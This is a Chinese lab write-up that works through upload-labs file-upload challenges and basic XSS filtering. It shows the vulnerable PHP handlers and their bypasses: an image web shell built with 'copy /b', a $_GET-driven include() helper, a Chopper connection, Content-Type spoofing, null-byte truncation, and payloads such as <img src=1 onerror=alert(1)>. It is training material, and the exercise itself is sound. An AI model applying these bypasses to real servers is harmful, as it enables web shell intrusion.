实验
文件上传漏洞
绕过内容检查实现文件上传
upload-labs-14
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
通过读前两个字节判断
copy C:\Users\28995\Desktop\1.jpg/b + C:\Users\28995\Desktop\14.php/a C:\Users\28995\Desktop\2.jpg
语句制作图片马
上传成功,需要当成php解析,还需在upload文件下写一个include.php
<?php
$file=$_GET['page'];
include($file);
?>
连接菜刀
upload-labs-15
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)>=0){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。
仍可用上一题的方法,也可以直接上传php,将Content-Type为image/gif,并添加上gif的文件头
绕过白名单检查实现文件上传
upload-labs-2
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}
直接抓包修改content-type类型
upload-labs-12
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
因为$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
是直接拼接,可以用%00截断
upload-labs-13
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传失败";
}
} else {
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
这题和上题一样可以用00截断,只是由POST形式传入
将2e前的33修改为00,上传成功
upload-labs-20
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上传出错!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
move_uploaded_file() 函数把上传的文件移动到新位置。
如果成功该函数返回 TRUE,如果失败则返回 FALSE。
图中的20就是保存名称中php后的空格,将其改为00,上传成功
xss
xss漏洞产生的基本原因为:在Web应用的网页中,部分显示内容会依据外界的输入值而发生变化,在生成HTML的过程中,如果HTML语法中含有特殊意义的字符(元字符)没有被正确处理,结果就会导致HTML或者是Javacript被注入,从而使得原来的HTML结构发生变化,然后就会滋生出我们常说的xss漏洞。
XSS基础防御对策一
htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体。
预定义的字符是:
&
(和号)成为&
"
(双引号)成为"
'
(单引号)成为'
<
(小于)成为<
>
( 大于)成为>
实例一
说明又xss漏洞
用htmlspecialchars()函数
实例二
不弹窗,查看源码,标签不在
用<img src=1 onerror=alert(1)>
或用大小写可绕过均
用htmlspecialchars()函数
实例三
直接使用大小写仍然弹窗,发现标签不在了
加了个i不区分大小写。
双拼,仍可弹窗
用htmlspecialchars()函数
实例四
源码,出现<script>
标签就会error
<img src=1 onerror=alert(1)>
可以绕过
仍然用htmlspecialchars()函数